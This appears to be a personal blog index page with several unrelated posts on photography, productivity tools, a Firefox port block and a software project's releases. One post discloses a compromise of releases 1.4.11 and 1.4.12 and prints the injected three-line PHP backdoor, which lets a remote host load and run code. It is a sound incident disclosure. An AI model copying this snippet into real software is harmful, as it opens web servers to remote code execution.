A little bit of a mouth full, and rather nerdy, but works pretty well. Gary Fong developed a Lightsphere Cloud, but I was resourceful, and constructed one from an ice cream container. I don’t even remember what ice-cream it was, but the container was the rigid semi-transparent plastic. I removed all the stickers, and labels. I then took my SB800 and traced a line in the lid around the SB800, and cut it out using a knife. When used (I’ll get some pictures of that later), it creates a nice even light source.

I’ve never been very good at keeping them, so I generally don’t try and make them. Instead, this year, I’m setting myself a couple of small goals..

• Get out on my bike at least once a week
• Take more photographs (Project365)
• Work more on the 101, and 102 Strobist guides.
• Get to the gym at least 3 times a week (See Stronglists 5x5)
• Improve Time Management (See Time Management For System Administrators)

I think that covers all my basic goals for this year. Some are pretty easy (take a picture daily), others might take a little more motivation (gym).

So, I couldn’t help but laugh… Of course, I’m a nerd, which explains it all… xkcd always seem to have some interesting stuff, but this one made me chuckle…

Oh, and happy new year.

I’ve recently been toying with the idea of setting up a schedule for my home servers to be up. As the only time I really use them is whilst at work (to stream music from), I considered a simple script to power them down at a set time (18:00), and power it up before I head to work. The problem is, I have a terrible memory, so I’m likely to forget to power the server up on the way out the door. Another solution was needed…

Ever tried to figure out how to get the perfect exposure? Old time photography pros probably already know all about the Guide Number, but Strobist has a quick guide to the “Guide Number”. It’s a handy bit of information, and I had a play with it this evening. You can dial in the f stop you want on the flash, the power level, and the iso, and it’ll tell you how far from the subject the flash should be. For example, on my SB-800, when set to ISO200, and 1/16th power, 50mm zoom, and f8, it says I should put the flash 2m away from the subject. Pretty nifty stuff. He even put up an image of an SB800 dialed in.

A few months ago Life Hacker tipped me off to an interesting app called Launchy. It’s a pretty handy application, allowing you to keep your hands on your keepboard to launch applications, and, if you follow LifeHacker, with a few tweaks, you can make it do a whole lot more.

Well, they just released version 2, which includes a new configuration dialog, and a new interface. It’s a handy little tool, and I’d recommend it for those that like to stay away from their mouse as much as possible, or even feel more comfortable at the keyboard. Hitting ALT + Space (configurable), you can type in the name of any app that is on your start menu, and launch it. Sort of similar to Mac’s QuickSilver.

Shortly after we released 1.4.12, somebody reported that the package didn’t match our checksum for it. This is not a good sign, so we set out to find out what might have happened. It turns out that one of the package managers had their account compromised, and the files released in 1.4.11, and 1.4.12, were modified after they were released.

The file change was quite tiny, 3 additional lines of code (and an additional one for a comment)…

/** set the value of the base path */
if (isset($_SERVER['HTTP_BASE_PATH'])) {
    define('SM_PATH',$_SERVER['HTTP_BASE_PATH']);
}

Initial views on the code change showed this shouldn’t be able to do anything, because HTTP_BASE_PATH wasn’t a defined variable. That’s where the problem is. These variables are passed in from the HTTP server, which means that the remote user could push them via the http transaction, and get PHP to load them. This is a bad thing, because it means that the next page loaded would really be loaded from the remote host. This then allows the user to execute malicious PHP code, as the webserver user, on the victim’s host, without any interaction with the victim at all.

Because of this, instead of redeploying the packages (which we initially did), we decided to pull both 1.4.11, and 1.4.12 from the site, and deploy 1.4.13.

They don’t run so well, when somebody changes all the passwords they run as, without notifying you… grumbles

Due to deployment times, we often have to make quick changes before other departments can catch up. One such example is IP deployments. It can take the corporate network team 48+ hours to get us a new IP address. This means to get a new site up and running quickly, we have to use a different port on a web server for initial testing. When attempting to test this new port in Firefox, firefox popped up an interesting error, one I’ve not seen before…

This address is restricted: This address uses a network port which is normally used for purposes other than Web browsing. Firefox has cancelled the request for your protection.

What? The site was running on port 79, so I know it was non-standard, but why did you block access? It never blocked access before, and I’ve used some weird ports before. I did a port 8000 passthru on my firewall at home, that works. Port 8000 isn’t normally used for web browsing, but proxying (slightly different).

A quick google shows this feature can be turned off using the about:config, more details can be found here on Scott Salyer’s blog. He also rants that this seems to be a relatively stupid feature, as well as a few others mentioned on his blog, namely Scott Bellware, and Sam Gentile, who also seem to dislike stupid security features.

[EDIT] As it appears the servers have vanished for Scott Salyer’s blog, a new link to here with details on how to resolve.

Phew… finally got 5 minutes to get 1.4.12 out the door. This release included a bug fix for attachment handling, which was nearly entirely broken with PHP 4, and just slightly broken in a minor area in PHP 5. Full details are in the ChangeLog, grab your copy.